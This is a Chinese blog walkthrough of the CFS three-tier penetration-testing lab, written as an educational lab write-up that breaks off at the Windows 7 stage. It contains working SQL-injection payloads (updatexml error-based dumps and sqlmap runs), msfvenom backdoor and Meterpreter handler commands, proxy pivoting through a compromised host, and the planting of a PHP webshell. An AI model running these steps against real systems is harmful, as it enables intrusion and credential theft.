<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="John Doe" />
  <meta name="description" content="" />
  
  
  <title>
    
      cfs靶场 
      
      
      |
    
     Hexo
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>

<meta name="generator" content="Hexo 6.0.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Oranges</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">cfs靶场</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2023-09-18 08:34:52
        </span>
        
      </div>
      <div class="markdown-body">
        <h1 id="CFS三层靶机"><a href="#CFS三层靶机" class="headerlink" title="CFS三层靶机"></a>CFS三层靶机</h1><h2 id="渗透流程"><a href="#渗透流程" class="headerlink" title="渗透流程"></a>渗透流程</h2><p>target2和target3不能连接外网，只能在内网进行通信。所以先渗透target1，作为跳板攻击target2和target3</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><h3 id="配置网卡"><a href="#配置网卡" class="headerlink" title="配置网卡"></a>配置网卡</h3><p>首先需要配置3张网卡搭建内网环境，在VM编辑处找到虚拟网络编辑器：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\1.png" alt></p>
<p>其中的4（11）,9（22）,10（33）三张网卡就是为了这个靶场而创建的三张网卡,再按照下面这个环境去更换网卡，在vm的主页选择打开虚拟机找到对应位置即可创建靶场所需的三台虚拟机（直接打开并导入）：</p>
<p>攻击机器（kali）——kali攻击机选择第四张网卡（11）</p>
<p>target1靶机服务器：centos——centos选择第4张（11）和第9张（22）网卡</p>
<p>target2内网主机：ubuntu——ubuntu选择第9张和第10张网卡</p>
<p>target3内网主机：windows7——win7选第10张网卡</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\22.png" alt></p>
<p>这样整个环境就搭建好了开启即可</p>
<h3 id="宝塔后台配置"><a href="#宝塔后台配置" class="headerlink" title="宝塔后台配置"></a>宝塔后台配置</h3><h4 id="centos"><a href="#centos" class="headerlink" title="centos"></a>centos</h4><p>开启target1，在靶机的描述部分附有宝塔后台地址</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\3.png" alt></p>
<p>直接开启后先进行登录root，查看ip：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\4.png" alt></p>
<p>把宝塔登录地址的ip换成自己的ip就可以登录</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\5.png" alt></p>
<p>进入宝塔面板，选择网站，再点击网站名192.168.1.110，将centos靶机中c段为11的ip添加进去，确保能够访问到对应的web页面：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\6.png" alt></p>
<h4 id="ubuntu"><a href="#ubuntu" class="headerlink" title="ubuntu"></a>ubuntu</h4><p>ubuntu进行同样的操作添加c段为22的ip</p>
<p>首先开启后登录root：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\7.png" alt></p>
<h4 id="win7"><a href="#win7" class="headerlink" title="win7"></a>win7</h4><p>win7直接开机即可</p>
<p>到这里搭建就全部完成了</p>
<p>这里模拟的是kali和centos的第一张网卡位于外网，即你拥有一台kali，现在给你一个ip为192.168.11.128的主机让你渗透</p>
<h3 id="信息记录"><a href="#信息记录" class="headerlink" title="信息记录"></a>信息记录</h3><h4 id="kali"><a href="#kali" class="headerlink" title="kali"></a>kali</h4><p>ip：</p>
<p>192.168.11.129</p>
<h4 id="centos-1"><a href="#centos-1" class="headerlink" title="centos"></a>centos</h4><p>ip：</p>
<p>192.168.11.128 </p>
<p>192.168.22.128</p>
<p>root密码：teamssix.com</p>
<p>宝塔后台登陆地址及密码：<br>地址：<a target="_blank" rel="noopener" href="http://192.168.11.128:8888/a768f109/">http://192.168.11.128:8888/a768f109/</a><br>账号：eaj3yhsl<br>密码：41bb8fee</p>
<h4 id="ubuntu-1"><a href="#ubuntu-1" class="headerlink" title="ubuntu"></a>ubuntu</h4><p>ip：</p>
<p>192.168.22.129</p>
<p>192.168.33.128</p>
<p>root密码：teamssix.com</p>
<p>宝塔后台登陆地址及密码：<br>地址：<a target="_blank" rel="noopener" href="http://192.168.22.129:8888/2cc52ec0/">http://192.168.22.129:8888/2cc52ec0/</a><br>账号：xdynr37d<br>密码：123qwe..</p>
<h4 id="win7-1"><a href="#win7-1" class="headerlink" title="win7"></a>win7</h4><p>ip：</p>
<p>192.168.33.33</p>
<p>Administrator密码：teamssix.com</p>
<h2 id="渗透实操"><a href="#渗透实操" class="headerlink" title="渗透实操"></a>渗透实操</h2><h3 id="打穿centos"><a href="#打穿centos" class="headerlink" title="打穿centos"></a>打穿centos</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>目前只有对方主机的ip，别无其他信息，故使用nmap对对方主机进行扫描，通过探测到的端口得知对方开启了什么服务</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\8.png" alt></p>
<p>可以看到对方开启的服务比较多，注意到80端口开启，这说明对方搭建了网站，网站就有各种的漏洞的可以尝试。先访问这个开启了80端口的ip：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\9.png" alt></p>
<p>访问后发现这是一个用thinkphp5版本搭建的网站</p>
<h4 id="获取webshell"><a href="#获取webshell" class="headerlink" title="获取webshell"></a>获取webshell</h4><p>tp5存在命令执行漏洞，直接用工具：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\10.png" alt></p>
<p>这个工具可以探测并利用存在漏洞的thinkphp</p>
<p>直接使用工具getshell：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\11.png" alt></p>
<p>访问这个带有木马的域名使用蚁剑来连接 ：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\12.png" alt></p>
<p>即可获取webshell</p>
<h5 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h5><p>系统根目录下</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\85.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\86.png" alt></p>
<p>flag.txt中含第一个flag{qEa12Nasd1a}</p>
<h5 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h5><p>网站根目录下</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\13.png" alt></p>
<p>flag21sA.txt里面放的是第二个flag{e2D3aFdasde}：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\14.png" alt></p>
<h5 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h5><p>网站robots.txt文件中</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\87.png" alt></p>
<p>第三个flag{QeaRqaw12fs}</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\88.png" alt></p>
<p>拿到centos的webshell后再利用蚁剑的终端做进一步信息收集，右键—&gt;在此处打开终端：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\15.png" alt></p>
<p>ifconfig时发现了另一个ip，这就说明了它还存在其他内网主机：192.168.22.128</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\16.png" alt></p>
<p>这台centos基本被拿下。下面便涉及到msf：先用msf创建一个后门，就是在桌面创建一个elf格式的木马，再开启监听，通过蚁剑上传，再直接控制终端运行这个木马即可监听到。</p>
<h4 id="获取主机权限"><a href="#获取主机权限" class="headerlink" title="获取主机权限"></a>获取主机权限</h4><p>用msf生成后门，但出现：</p>
<p>msfvenom: command not found</p>
<p>需安装MSF框架，需要根据自己的系统的系统架构来选择。到官网下载deb安装包：</p>
<p>官网地址<a target="_blank" rel="noopener" href="https://apt.metasploit.com/">Directory Tree (metasploit.com)</a><br>然后，执行命令（根据你选择的包和系统具体替换）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo dpkg -i metasploit-framework_6.3.34+20230910102724~1rapid7-1_amd64.deb</span><br></pre></td></tr></table></figure>
<p>安装成功。</p>
<p>msf生成后门：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\17.png" alt></p>
<p>将后门上传，kali开监控，执行木马：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\18.png" style="zoom:67%;"></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\19.png" alt></p>
<p>开启服务：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\20.png" style="zoom:67%;"></p>
<p>在蚁剑中：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\21.png" alt></p>
<p>回到kali：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\23.png" alt></p>
<p>截至现在，彻底了拿到了centos的权限。接下来再打它的内网，刚才nmap探测出可能内网还有其他主机，这里就来进行探测打其他的主机。</p>
<h3 id="打穿ubuntu"><a href="#打穿ubuntu" class="headerlink" title="打穿ubuntu"></a>打穿ubuntu</h3><h4 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h4><p>直接尝试nmap扫描另一张网卡的其他主机：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.22.0/24</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\24.png" style="zoom:67%;"></p>
<p>出现了一堆failed，说明了一个都扫不到。原因是我们的网段设置，这里扫描是用的kali的ip扫描，模拟的环境中kali和centos是公网主机，所以可以直接扫到，而现在扫的属于内网网段，扫不到很正常。</p>
<p>刚才我们打下的centos虽然是公网主机，但是它也在这个内网。于是就用centos的ip来打它的内网，先用msf自带的探测网络接口的模块（get_local_subnets）和查看路由的模块(autoroute -p)来进一步进行信息探测，注意不要退出终端页面！直接run：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run get_local_subnets</span><br><span class="line">run autoroute -p</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\25.png" alt></p>
<p>这里查到centos处于三个网段内，刚才nmap扫出来只有两个网段，这说明122的网段就是出题方来迷惑的</p>
<p>而且当前没有路由 （路由是指路由器从一个接口上收到数据包，根据数据包的目的地址进行定向并转发到另一个接口的过程，就相当于把我们要传输的数据先传输到该路由，再发往目标）</p>
<p>centos上没有msf，所以可以通过设置路由的方式把我们的请求从centos发出，这样就可以在kali上访问到centos的ip了</p>
<h4 id="信息分析"><a href="#信息分析" class="headerlink" title="信息分析"></a>信息分析</h4><p>故添加一个路由(autoroute -s)，因为我们已经在11网段内，所以添加的路由肯定添加22网段的，就可以理解为我们建立了一个攻击机kali和该网段的隧道</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 192.168.22.0/24</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\32.png" style="zoom:80%;"></p>
<p>现在便可以与22网段通信了，接下来继续用nmap扫描该内网网段下存活了哪些主机，（注意：这里使用nmap扫描要禁用ping检测，即-Pn，因为不一定能ping通）</p>
<p>这里的路由还有缺陷：它只能在这个msf建立的会话上使用，假如我们新开一个终端使用nmap扫描，还是扫不到。所以这里就涉及到：msf的代理配置。</p>
<h4 id="msf的代理配置"><a href="#msf的代理配置" class="headerlink" title="msf的代理配置"></a>msf的代理配置</h4><p>msf有自己的代理模块（auxiliary/server/socks_proxy ）</p>
<p>先来开启代理服务，srvport是端口随便定，只要不被占用</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\27.png" alt></p>
<p>再进入 /etc/proxychains4.conf更改代理配置即可。</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\29.png" alt></p>
<p>在该文件的最下面一行，把ip更改为kali攻击机的ip（192.168.11.129），端口更改为刚刚配置模块的端口（2222），更改后：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\28.png" alt></p>
<p>此时在指令前输入proxychains4即可走代理来执行该命令，用nmap检验：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\30.png" alt></p>
<p>能探测ubuntu的端口，说明代理配置成功（千万注意前面的终端页面都不要关，路由必须设置才可以成功）</p>
<h4 id="拿下Ubuntu-webshell"><a href="#拿下Ubuntu-webshell" class="headerlink" title="拿下Ubuntu webshell"></a>拿下Ubuntu webshell</h4><p>跟拿下centos的webshell一样的原理，开放了80端口，所以直接访问其网页</p>
<p>在kali上打开，但是浏览器并不能直接访问Ubuntu的网站，同样需要加上代理，根据靶机的ip如下配置</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\31.png" alt></p>
<p>配置之后直接访问Ubuntu的ip就可以访问对应的网站</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\33.png" alt></p>
<p>可以看到这是一个cms系统，一般步骤是先探测版本再去看对应版本有无漏洞，但是这里的开发者审查工具直接提示了sql注入：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\34.png" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?r=vul&amp;keyword=1</span><br></pre></td></tr></table></figure>
<p>直接访问它给的有sql注入的漏洞站点，进行测试：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\35.png" alt></p>
<p>直接用sqlmap来跑，注意这里的sqlmap也要配置代理（用自带的) </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 探测url是否存在漏洞 是什么类型</span><br><span class="line">python3 sqlmap.py -u &quot;http://192.168.22.129/index.php?r=vul&amp;keyword=1&quot; --proxy=socks4://192.168.11.129:2222</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\36.png" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u &quot;http://192.168.22.129/index.php?r=vul&amp;keyword=1&quot; --proxy=socks4://192.168.11.129:2222 --dbs</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\37.png" alt></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u &quot;http://192.168.22.129/index.php?r=vul&amp;keyword=1&quot; --proxy=socks4://192.168.11.129:2222 -D bagecms --tables </span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\38.png" style="zoom:67%;"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u &quot;http://192.168.22.129/index.php?r=vul&amp;keyword=1&quot; --proxy=socks4://192.168.11.129:2222 -D begacms -T bage_admin --columns</span><br></pre></td></tr></table></figure>
<p>一路yes，还没跑出来就把代理弄崩了</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\39.png" alt></p>
<p>正常情况最后要扫出username和password。但是等待时间过长，且会掉线：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u &quot;http://192.168.22.129/index.php?r=vul&amp;keyword=1&quot; --proxy=socks4://192.168.11.129:2222 -D begacms -T bage_admin -C username,password --dump</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\48.png" alt></p>
<p>尝试手工进行报错注入。</p>
<p>先加’，报错，说明存在交互：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\40.png" style="zoom:67%;"></p>
<p>但在测试1=2时候发现与预想页面不一致：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\41.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\42.png" alt></p>
<p>将—+改为#试试：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\43.png" alt></p>
<p>根据页面结果得知是字符型。页面虽然有东西，但是只有对于请求对错出现不一样页面其余的就没有了，页面无回显位，考虑报错注入。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.22.129/index.php?r=vul&amp;keyword=1%20%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20%20--+</span><br></pre></td></tr></table></figure>
<p>这时候#又不行了换回—+，爆出数据库bagecms</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\44.png" alt></p>
<p>爆出表bage_admin</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.22.129/index.php?r=vul&amp;keyword=1%20%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27bagecms%27),0x7e),1)%20%20--+</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\45.png" alt></p>
<p>爆列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.22.129/index.php?r=vul&amp;keyword=1%20%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27bagecms%27%20and%20table_name=%27bage_admin%27),0x7e),1)%20%20--+</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\46.png" alt></p>
<p>爆出账户名和密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.22.129/index.php?r=vul&amp;keyword=1%20%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,password)%20from%20bage_admin),0x7e),1)%20%20--+</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\47.png" alt></p>
<p>‘~admin46f94c8de14fb36680850768ff’右边的~没出来，修改命令，显示右边十位：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.22.129/index.php?r=vul&amp;keyword=1%27%20%20and%20%20updatexml(1,concat(0x7e,right((select%20group_concat(username,%27--%27,password)%20from%20bagecms.bage_admin),10),0x7e),1)--+</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\55.png" alt></p>
<p>‘~68ff1b7f2a~’</p>
<p>拼接获得完整的密码：’~admin46f94c8de14fb36680850768ff1b7f2a’</p>
<p>利用md5解密，得到密码123qwe</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\54.png" alt></p>
<p>获得这个网站的账号密码就需要找到后台登录页面，利用御剑，得到这个网站的webshell</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\50.png" alt></p>
<p>在robots.txt上面找到了登录地址</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\51.png" alt></p>
<p>在连接上加上/index.php?r=admini后访问，跳转到如下页面，使用获取的账户密码登录：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\52.png" alt></p>
<h5 id="flag4"><a href="#flag4" class="headerlink" title="flag4"></a>flag4</h5><p>管理后台中</p>
<p>得到第四个flag： flag{eS3sd1IKarw}</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\56.png" alt></p>
<p>在模板处写入一句话木马后提交：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\58.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\59.png" alt></p>
<p>发现使用了很多模块化文件，而且都是php格式，直接在其中的一个php文件中加入一句话木马，再访问该文件位置，并用蚁剑连接：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\60.png" alt></p>
<p>但因为这里只是靶场，用的都是虚拟机的仅主机模式，所以蚁剑可以直接连接，平时正常情况下是不行的，需要给蚁剑配置kali一样的代理，这里是靶场就不需要了<br><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\61.png" alt></p>
<p>这里就拿到了webshell的权限</p>
<h4 id="获得ubuntu主机权限"><a href="#获得ubuntu主机权限" class="headerlink" title="获得ubuntu主机权限"></a>获得ubuntu主机权限</h4><p>拿下了webshell，便开始拿主机权限</p>
<p>同理，我们再生成针对Ubuntu的木马，目标是22网段（注意木马的shell只能采取正向连接，因为我们是搭建隧道来访问Ubuntu）（因为正常访问是访问不到的，但是它处于内网中也访问不到我们。即通过它来连接我们是不行的，而且让他通过隧道来找我们也不行。还是得我们通过隧道去找他，所以只能正向）</p>
<p>msf生成上传木马，获取shell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/meterpreter/bind_tcp……</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\62.png" alt></p>
<p>同样的msf新开一个页面开启监听，但是这里要注意，msf新开一个页面后之前的那个页面的所有东西都用不了，所以不能直接msfconsole打开，msf这里也需要走代理 ，就是在用proxychains msfconsole来启动msf：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\63.png" alt></p>
<p>再设置payload，设置lport，设置phost，即可开启监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload linux/x64/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.22.129</span><br><span class="line">set lport 3333</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\64.png" alt></p>
<p>发现一直被拒绝</p>
<p>将kali生成的2.elf粘贴到windows中，注意要关闭病毒威胁，否则拖不进去。再将用蚁剑将生成的木马2.elf上传到ubuntu</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\67.png" alt></p>
<h5 id="flag5"><a href="#flag5" class="headerlink" title="flag5"></a>flag5</h5><p>网站根目录下</p>
<p>flag42Fs.txt放着第五个flag{23ASfqwr4t2e}</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\84.png" alt></p>
<h5 id="flag6"><a href="#flag6" class="headerlink" title="flag6"></a>flag6</h5><p>系统根目录下</p>
<p>flag{1a2saA23eas}</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\89.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\90.png" alt></p>
<h5 id="flag7"><a href="#flag7" class="headerlink" title="flag7"></a>flag7</h5><p>日志文件中</p>
<p>flag{fAiLdaskdaew}</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\91.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\92.png" alt></p>
<h5 id="flag8"><a href="#flag8" class="headerlink" title="flag8"></a>flag8</h5><p>passwd文件中</p>
<h5 id="flag9"><a href="#flag9" class="headerlink" title="flag9"></a>flag9</h5><p>crontab文件中</p>
<p>并打开终端执行这个木马：</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\68.png" alt></p>
<p>即可回弹shell</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\71.png" alt></p>
<p>至此成功拿下ubuntu的主机权限，那么就只剩下一台windows7了</p>
<h3 id="打穿win7"><a href="#打穿win7" class="headerlink" title="打穿win7"></a>打穿win7</h3><h4 id="信息收集-2"><a href="#信息收集-2" class="headerlink" title="信息收集"></a>信息收集</h4><p>看网络接口，发现还有33网段，这便是搭建的windows7</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\72.png" alt></p>
<p>用蚁剑也可以查看</p>
